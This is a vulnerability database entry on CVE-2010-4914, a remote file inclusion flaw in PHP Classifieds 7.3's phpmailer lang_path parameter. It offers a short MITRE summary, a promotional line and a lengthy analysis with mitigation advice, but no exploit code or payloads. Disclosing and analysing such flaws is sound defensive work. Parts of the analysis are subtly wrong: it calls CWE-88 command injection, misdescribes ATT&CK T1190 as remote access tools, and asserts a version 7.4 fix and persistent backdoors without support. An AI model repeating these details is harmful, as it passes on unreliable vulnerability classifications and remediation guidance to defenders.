CVE-2010-4914 in PHP Classifieds
Summary
by MITRE
PHP remote file inclusion vulnerability in tools/phpmailer/class.phpmailer.php in PHP Classifieds 7.3 allows remote attackers to execute arbitrary PHP code via a URL in the lang_path parameter.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 10/30/2025
The vulnerability identified as CVE-2010-4914 represents a critical remote file inclusion flaw in the PHP Classifieds 7.3 software ecosystem. This security weakness resides within the tools/phpmailer/class.phpmailer.php file and specifically targets the lang_path parameter handling mechanism. The vulnerability enables malicious actors to inject arbitrary PHP code execution by manipulating the lang_path parameter with a remote URL, effectively bypassing local file validation controls and establishing a persistent backdoor within the affected system infrastructure.
This vulnerability operates under the well-documented CWE-88 principle of command injection, where user-supplied input is directly incorporated into system commands without proper sanitization or validation. The flaw stems from insufficient input validation mechanisms that fail to properly filter or escape user-provided URLs before they are processed within the application context. Attackers can leverage this weakness by crafting malicious URLs that point to remote servers hosting malicious PHP payloads, which then get executed within the context of the web application. The vulnerability aligns with ATT&CK technique T1190, which describes the use of remote access tools and malicious code execution through web application vulnerabilities.
The operational impact of CVE-2010-4914 extends far beyond simple code execution, as it provides attackers with complete system compromise capabilities. Once exploited, the vulnerability allows for arbitrary command execution, data exfiltration, and potential lateral movement within network environments. The affected PHP Classifieds 7.3 platform becomes a vector for more sophisticated attacks including credential theft, database manipulation, and establishment of persistent access points. The vulnerability affects the core mailer functionality and can be exploited through various attack vectors including web browser manipulation, automated scanning tools, or social engineering campaigns that trick users into interacting with malicious URLs.
Mitigation strategies for this vulnerability must address both immediate remediation and long-term security hardening measures. The most effective immediate solution involves patching the application to version 7.4 or later, which contains proper input validation and sanitization mechanisms. Additionally, implementing proper input validation at the application level, including whitelisting acceptable values for the lang_path parameter, can prevent exploitation attempts. Network-level protections such as web application firewalls should be configured to detect and block suspicious URL patterns targeting the vulnerable parameter. Security configurations should enforce proper file inclusion practices, disable remote file inclusion features, and implement strict access controls for sensitive application directories. Regular security audits and penetration testing should be conducted to identify similar vulnerabilities in the application codebase and ensure that input validation mechanisms remain effective against evolving attack techniques.